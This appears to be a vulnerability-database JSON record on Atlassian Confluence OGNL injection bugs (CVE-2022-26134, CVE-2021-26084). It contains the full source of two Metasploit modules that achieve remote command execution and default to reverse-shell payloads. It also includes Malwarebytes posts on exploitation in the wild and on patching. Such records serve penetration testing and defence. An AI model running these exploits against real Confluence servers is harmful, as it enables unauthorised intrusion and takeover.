"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-03T20:50:59", "id": "WALLARMLAB:E69ED97E0B27F68EA2CE3BB7BA9FE681", "href": "https://lab.wallarm.com/update-on-the-confluence-0-day-vulnerability-cve-2022-26134/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-06-24T08:36:35", "description": "This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.\n", "cvss3": {}, "published": "2022-06-03T19:27:13", "type": "metasploit", "title": "Atlassian Confluence Namespace OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-15T21:11:56", "id": "MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_NAMESPACE_OGNL_INJECTION-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/atlassian_confluence_namespace_ognl_injection/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence Namespace OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to\n evaluate an OGNL expression resulting in OS command execution.\n },\n 'Author' => [\n 'Unknown', # exploited in the wild\n 'bturner-r7',\n 'jbaines-r7',\n 'Spencer McIntyre'\n ],\n 'References' => [\n ['CVE', '2022-26134'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'],\n ['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],\n ['URL', 'https://github.com/jbaines-r7/through_the_wire'],\n ['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis']\n ],\n 'DisclosureDate' => '2022-06-02',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux', 'win'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n confluence_version = get_confluence_version\n return CheckCode::Unknown unless confluence_version\n\n vprint_status(\"Detected Confluence version: #{confluence_version}\")\n\n confluence_platform = get_confluence_platform\n unless confluence_platform\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n vprint_status(\"Detected target platform: #{confluence_platform}\")\n CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def get_confluence_platform\n # this method gets the platform by exploiting CVE-2022-26134\n return @confluence_platform if @confluence_platform\n\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n ognl = <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n ${\n Class.forName(\"com.opensymphony.webwork.ServletActionContext\")\n .getMethod(\"getResponse\",null)\n .invoke(null,null)\n .setHeader(\n \"#{header}\",\n Class.forName(\"javax.script.ScriptEngineManager\")\n .newInstance()\n .getEngineByName(\"js\")\n .eval(\"java.lang.System.getProperty('os.name')\")\n )\n }\n OGNL\n res = inject_ognl(ognl)\n return nil unless res\n\n res.headers[header]\n end\n\n def get_confluence_version\n return @confluence_version if @confluence_version\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'login.action')\n )\n return nil unless res&.code == 200\n\n poweredby = res.get_xml_document.xpath('//ul[@id=\"poweredby\"]/li[@class=\"print-only\"]/text()').first&.text\n return nil unless poweredby =~ /Confluence (\\d+(\\.\\d+)*)/\n\n @confluence_version = Rex::Version.new(Regexp.last_match(1))\n @confluence_version\n end\n\n def exploit\n confluence_platform = get_confluence_platform\n unless confluence_platform\n fail_with(Failure::NotVulnerable, 'The target is not vulnerable.')\n end\n\n unless confluence_platform.downcase.start_with?('win') == (target['Platform'] == 'win')\n fail_with(Failure::NoTarget, \"The target platform '#{confluence_platform}' is incompatible with '#{target.name}'\")\n end\n\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n ognl = <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n ${\n Class.forName(\"com.opensymphony.webwork.ServletActionContext\")\n .getMethod(\"getResponse\",null)\n .invoke(null,null)\n .setHeader(\"#{header}\",\n Class.forName(\"javax.script.ScriptEngineManager\")\n .newInstance()\n .getEngineByName(\"js\")\n .eval(\"java.lang.Runtime.getRuntime().exec([\n #{target['Platform'] == 'win' ? \"'cmd.exe','/c'\" : \"'/bin/sh','-c'\"},\n com.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}')\n ]); '#{Faker::Internet.uuid}'\")\n )\n }\n OGNL\n res = inject_ognl(ognl, 'headers' => { header => cmd })\n\n unless res && res.headers.include?(header)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n res.headers[header]\n end\n\n def inject_ognl(ognl, opts = {})\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl), 'dashboard.action')\n }.merge(opts))\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-24T08:36:59", "description": "This module exploits an OGNL injection in Atlassian Confluence's WebWork component to execute commands as the Tomcat user.\n", "cvss3": {}, "published": "2021-10-14T21:58:04", "type": "metasploit", "title": "Atlassian Confluence WebWork OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-14T21:58:04", "id": "MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_WEBWORK_OGNL_INJECTION-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/atlassian_confluence_webwork_ognl_injection/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n include Msf::Module::Deprecated\n\n # Added Windows support\n moved_from 'exploit/linux/http/atlassian_confluence_webwork_ognl_injection'\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence WebWork OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence's\n WebWork component to execute commands as the Tomcat user.\n },\n 'Author' => [\n 'Benny Jacob', # Discovery\n 'Jang', # Analysis\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-26084'],\n ['URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-67940'],\n ['URL', 'https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis'],\n ['URL', 'https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md'],\n ['URL', 'https://testbnull.medium.com/atlassian-confluence-pre-auth-rce-cve-2021-26084-v%C3%A0-c%C3%A2u-chuy%E1%BB%87n-v%E1%BB%81-%C4%91i%E1%BB%83m-m%C3%B9-khi-t%C3%ACm-bug-43ab36b6c455'],\n ['URL', 'https://tradahacking.vn/atlassian-confluence-cve-2021-26084-the-other-side-of-bug-bounty-45ed19c814f6']\n ],\n 'DisclosureDate' => '2021-08-25',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux', 'win'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'\n }\n }\n ],\n [\n 'PowerShell Stager',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n token1 = rand_text_alphanumeric(8..16)\n token2 = rand_text_alphanumeric(8..16)\n token3 = rand_text_alphanumeric(8..16)\n\n res = inject_ognl(\"#{token1}'+'#{token2}'+'#{token3}\")\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.body.include?(\"#{token1}#{token2}#{token3}\")\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n when :psh\n execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))\n end\n end\n\n def execute_command(cmd, _opts = {})\n res = inject_ognl(ognl_payload(cmd))\n\n unless res&.code == 200 && res.body.match?(/queryString.*Process.*pid.*exitValue/)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n end\n\n def inject_ognl(ognl)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/pages/createpage-entervariables.action'),\n 'vars_post' => {\n # https://commons.apache.org/proper/commons-ognl/apidocs/org/apache/commons/ognl/JavaCharStream.html\n # https://github.com/jkuhnert/ognl/blob/f4e18cda6a89bcdad15c617c0d94013a854a1e93/src/main/java/ognl/JavaCharStream.java#L324-L341\n 'queryString' => Rex::Text.to_hex(ognl, '\\\\u00')\n }\n )\n end\n\n def ognl_payload(cmd)\n # https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#expression-language-el---code-execution\n # https://www.tutorialspoint.com/java/lang/class_forname_loader.htm\n # https://docs.oracle.com/javase/7/docs/api/java/lang/ProcessBuilder.html\n # https://docs.oracle.com/javase/8/docs/api/java/util/Base64.Decoder.html\n <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n '+Class.forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval('\n new java.lang.ProcessBuilder(\n #{target_shell},\n new java.lang.String(\n java.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\")\n )\n ).start()\n ')+'\n OGNL\n end\n\n def target_shell\n target['Platform'] == 'win' ? '\"cmd.exe\",\"/c\"' : '\"/bin/sh\",\"-c\"'\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/atlassian_confluence_webwork_ognl_injection.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2022-06-14T17:04:04", "description": "Microsoft has warned that &quot;multiple adversaries and nation-state actors&quot; are making use of the recent Atlassian Confluence RCE vulnerability. A fix is now available for [CVE-2022-26134](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134>). It is essential users of Confluence address the patching issue immediately. \n\n## Confluence vulnerability: Background\n\nAt the start of June, researchers [discovered a vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/>) in Atlassian Confluence via an incident response investigation. Confluence, a Wiki-style collaboration tool, experienced a &quot;critical unauthenticated remote code execution vulnerability&quot;. It affected Confluence server and Confluence Data Center.\n\nThe attack discovered during the investigation revealed web shells deployed on the server. These web shells allow for Persistent access on compromised web applications. The web server process and its child processes ran as root and full privileges. This is very bad news, and allowed for execution of commands even without valid credentials.\n\nWorse, the web shell found is one commonly used by various Advanced Persistent Threat (APT) groups. This almost certainly isn&#x27;t the kind of thing admins discovering an attack want to hear mid-investigation.\n\nUnfortunately, mitigation advice was somewhat limited. It veered between restricting access to just turning off Confluence Server and Data Center instances. On June 3, Atlassian [released](<https://confluence.atlassian.com/doc/confluence-release-notes-327.html>) versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contained a fix for this vulnerability.\n\n## The current situation\n\nHere&#x27;s the latest observations from Microsoft:\n\n> Multiple adversaries and nation-state actors, including DEV-0401 and DEV-0234, are taking advantage of the Atlassian Confluence RCE vulnerability CVE-2022-26134. We urge customers to upgrade to the latest version or apply recommended mitigations: <https://t.co/C3CykQgrOJ>\n> \n> -- Microsoft Security Intelligence (@MsftSecIntel) [June 11, 2022](<https://twitter.com/MsftSecIntel/status/1535417776290111489?ref_src=twsrc%5Etfw>)\n\nMicrosoft continues:\n\n> _In many cases impacted devices have been observed with multiple disparate instances of malicious activity, including extensive device and domain discovery, and the deployment of payloads like Cobalt Strike, web shells, botnets like Mirai and Kinsing, coin miners, and ransomware._\n\n## A mixed bag of attacks\n\nIndustrious malware authors really have been having a grand time of things with this vulnerability. As noted by Microsoft, several varied approaches to compromise and exploitation are being used. [AvosLocker Ransomware](<https://www.bleepingcomputer.com/news/security/confluence-servers-hacked-to-deploy-avoslocker-cerber2021-ransomware/>) and [Linux botnets](<https://www.bleepingcomputer.com/news/security/linux-botnets-now-exploit-critical-atlassian-confluence-bug/>) are getting in on the action. Cryptomining [jumping on the bandwagon](<https://www.bleepingcomputer.com/news/security/hackers-exploit-recently-patched-confluence-bug-for-cryptomining/>) is an inevitability across most scams we see, and this is no exception.\n\nMicrosoft also noticed the Confluence vulnerability being exploited to download and deploy Cerber2021 ransomware. The Record [observed](<https://therecord.media/microsoft-ransomware-groups-nation-states-exploiting-atlassian-confluence-vulnerability/>) that Cerber2021 is a &quot;relatively minor player&quot;, with both Windows and Linux versions used to lock up machines. Here&#x27;s an example of the ransomware, via MalwareHunterTeam:\n\n> There is a ransomware currently active that is calling itself Cerber. \nHas Windows &amp; Linux versions. \nLooks started to spread in the first half of November. IDR seen both Linux (multiple victims got git files encrypted) &amp; Windows user victims already from different countries. \n \n [pic.twitter.com/saPGsTlDbt](<https://t.co/saPGsTlDbt>)\n> \n> -- MalwareHunterTeam (@malwrhunterteam) [December 4, 2021](<https://twitter.com/malwrhunterteam/status/1467264298237972484?ref_src=twsrc%5Etfw>)\n\nHaving the fixes to address this issue is great, but organisations need to actually make use of them. This is still a serious problem for anyone using unpatched versions of affected Confluence installations.\n\nIf you don&#x27;t want to run the gauntlet of APT groups, cryptomining chancers, botnets and more, the message is loud and clear: get on over to the [Confluence Download Archives](<https://www.atlassian.com/software/confluence/download-archives>) and patch immediately.\n\nThe post [&quot;Multiple adversaries&quot; exploiting Confluence vulnerability, warns Microsoft](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/multiple-adversaries-exploiting-confluence-vulnerability-warns-microsoft/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-14T12:43:08", "type": "malwarebytes", "title": "\u201cMultiple adversaries\u201d exploiting Confluence vulnerability, warns Microsoft", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-14T12:43:08", "id": "MALWAREBYTES:4E1B9086679032E60157678F3E82229D", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/multiple-adversaries-exploiting-confluence-vulnerability-warns-microsoft/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-03T21:56:15", "description": "[Researchers](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>) found a vulnerability in Atlassian Confluence by conducting an incident response investigation. Atlassian rates the severity level of this vulnerability as critical.\n\nAtlassian has issued a [security advisory ](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>)and is working on a fix for the affected products. This qualifies the vulnerability as an actively exploited in the wild zero-day vulnerability.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This vulnerability is listed as [CVE-2022-26134](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134>).\n\n## Confluence\n\nAtlassian Confluence is a collaboration tool in wiki style. Confluence is a team collaboration platform that connects teams with the content, knowledge, and their co-workers, which helps them find all the relevant information in one place. Teams use it to work together on projects and share knowledge.\n\nConfluence Server is the on-premises version which is being phased out. Confluence Data Center is the self-managed enterprise edition of Confluence.\n\n## The vulnerability\n\nThe description of CVE-2022-26134 says it is a critical unauthenticated remote code execution vulnerability in Confluence Server and Confluence Data Center.\n\nDuring the investigation, the researchers found JSP web shells written to disk. JSP (Jakarta Server Pages or Java Server Pages) is a server-side programming technology that helps software developers create dynamically generated web pages based on HTML, XML, SOAP, or other document types. JSP is similar to PHP and ASP, but uses the Java programming language.\n\nIt became clear that the server compromise stemmed from an attacker launching an exploit to achieve remote code execution. The researchers were able to recreate that exploit and identify a zero-day vulnerability impacting fully up-to-date versions of Confluence Server.\n\nAfter the researchers contacted Atlassian, Atlassian confirmed the vulnerability and subsequently assigned the issue to CVE-2022-26134. It confirmed the vulnerability works on current versions of Confluence Server and Data Center.\n\n## The attack\n\nThe researchers at Volexity were unwilling to provide any details about the attack method since there is no patch available for this vulnerability. However, they were able to provide some details about the shells that were dropped by exploiting the vulnerability.\n\nA web shell is a a malicious script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)\n\nThis web shell was identified as the China Chopper web shell. The China Chopper web shell is commonly used by malicious Chinese actors, including advanced persistent threat (APT) groups, to remotely control web servers. The web shell has two parts, the client interface and the small (4 kilobytes in size) receiver host file on the compromised web server. But access logs seemed to indicate that the China Chopper web only served as a means of secondary access.\n\nOn further investigation they found bash shells being launched by the Confluence web application process. This stood out because it had spawned a bash process which spawned a Python process that in turn spawned a bash shell. Bash is the default shell for many Linux distros and is short for the GNU Bourne-Again Shell.\n\nResearch showed that the web server process as well as the child processes created by the exploit were all running as root (with full privileges) user and group. These types of vulnerabilities are dangerous, as it allows attackers to execute commands and gain full control of a vulnerable system. They can even do this without valid credentials as long as it is possible to make web requests to the Confluence system.\n\nAfter successfully exploiting the Confluence Server systems, the attacker immediately deployed an in-memory copy of the BEHINDER implant. BEHINDER provides very powerful capabilities to attackers, including memory-only web shells and built-in support for interaction with [Meterpreter](<https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/>) and [Cobalt Strike](<https://blog.malwarebytes.com/glossary/cobalt-strike/>).\n\n## Mitigation\n\nThere are currently no fixed versions of Confluence Server and Data Center available. In the interim, users should work with their security team to consider the best course of action. Options to consider include:\n\n * Restricting access to Confluence Server and Data Center instances from the internet.\n * Disabling Confluence Server and Data Center instances.\n * If you are unable to take the above actions, implementing a WAF (Web Application Firewall) rule which blocks URLs containing **${** may reduce your risk.\n\n_Note: **${** is the first part of a parameter substitution in a shell script_\n\n## Affected versions\n\nAll supported versions of Confluence Server and Data Center are affected. And according to Atlassian it\u2019s likely that **all** versions of Confluence Server and Data Center are affected, but they are still investigating and have yet to confirm the earliest affected version.\n\nOne important exception: if you access your Confluence site via an atlassian.net domain. This means it is hosted by Atlassian and is not vulnerable.\n\nWe will keep you posted about the developments, so stay tuned.\n\n## Update June 3, 2022\n\nAtlassian has released versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contain a fix for this issue.\n\n**What You Need to Do**\n\nAtlassian recommends that you upgrade to the latest Long Term Support release. For a full description of the latest version, see the [Confluence Server and Data Center Release Notes](<https://confluence.atlassian.com/doc/confluence-release-notes-327.html>). You can download the latest version from the [download centre](<https://www.atlassian.com/software/confluence/download-archives>).\n\nThe post [[updated]Unpatched Atlassian Confluence vulnerability is actively exploited](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-06-03T14:41:58", "type": "malwarebytes", "title": "[updated]Unpatched Atlassian Confluence vulnerability is actively exploited", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-03T14:41:58", "id": "MALWAREBYTES:CA300551E02DA3FFA4255FBA0359A555", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-04-29T18:23:40", "description": "A joint Cybersecurity Advisory, coauthored by cybersecurity authorities of the United States (CISA, NSA, and FBI), Australia (ACSC), Canada (CCCS), New Zealand (NZ NCSC), and the United Kingdom (NCSC-UK) has detailed the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that made it into the top 10.\n\n## 1\\. Log4Shell\n\n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), commonly referred to as [Log4Shell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/>) or Logjam. This was a software flaw in the Apache Log4j logging utility. A logger is a piece of software that logs every event that happens in a computer system. The records it produces are useful for IT and security folks to trace errors or check any abnormal behavior within a system.\n\nWhen Log4Shell emerged in December 2021, what caught many by surprise was the enormous number of applications and web services, including those offered by Twitter, Apple, Google, Amazon, Steam, and Microsoft, among others, that were relying on Log4j, many of which inherited the vulnerability.\n\nThis made for an exceptionally broad attack surface. Combine that with an incredibly easy to use exploit and there should be no surprise that this vulnerability made it to the top of the list.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has launched an open source scanner to find applications that are vulnerable to the Log4j vulnerabilities listed as CVE-2021-44228 and CVE-2021-45046. The [CISA Log4j scanner](<https://github.com/cisagov/log4j-scanner>) is based on other open source tools and supports scanning lists of URLs, several fuzzing options, DNS callback, and payloads to circumvent web-application firewalls.\n\n## 2\\. CVE-2021-40539\n\n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) is a REST API authentication bypass [vulnerability in ManageEngine\u2019s single sign-on (SSO) solution](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) with resultant remote code execution (RCE) that exists in Zoho ManageEngine ADSelfService Plus version 6113 and prior. When word of this vulnerability came out it was already clear that it was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other researchers chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat actor. It was clear from the start that [APT](<https://blog.malwarebytes.com/glossary/advanced-persistent-threat-apt/>) threat-actors were likely among those exploiting the vulnerability.\n\nThe vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This allows attackers to carry out subsequent attacks resulting in RCE.\n\nFor those that have never heard of this software, it\u2019s a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network. A patch for this vulnerability was made available on September 7, 2021. Users were advised to update to ADSelfService Plus build 6114. The FBI, CISA, and CGCYBER also strongly urged organizations to make sure that ADSelfService Plus was not directly accessible from the Internet.\n\nThe [ManageEngine site](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) has specific instructions on how to identify and update vulnerable installations.\n\n## 3\\. ProxyShell\n\nThird on the list are 3 vulnerabilities that we commonly grouped together and referred to as [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>). [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>), [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>), and [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>).\n\nThe danger lies in the fact that these three vulnerabilities can be chained together to allow a remote attacker to run code on an unpatched Microsoft Exchange server. Attackers use them as follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control **with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34473, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\nThe vulnerabilities were found in Microsoft Exchange Server, which has a large userbase and which is usually set up as an Internet-facing instance. Plus, many publications have provided proof-of-concept (PoC) methodologies which anyone can copy and use.\n\nMicrosoft\u2019s Security Update from May 2021 remediates all three ProxyShell vulnerabilities.\n\n## 4\\. ProxyLogon\n\nAfter the ProxyShell entries we go straight to four vulnerabilities that are grouped under a similar name\u2014[ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>)\u2014for similar reasons. [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-2685](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), and 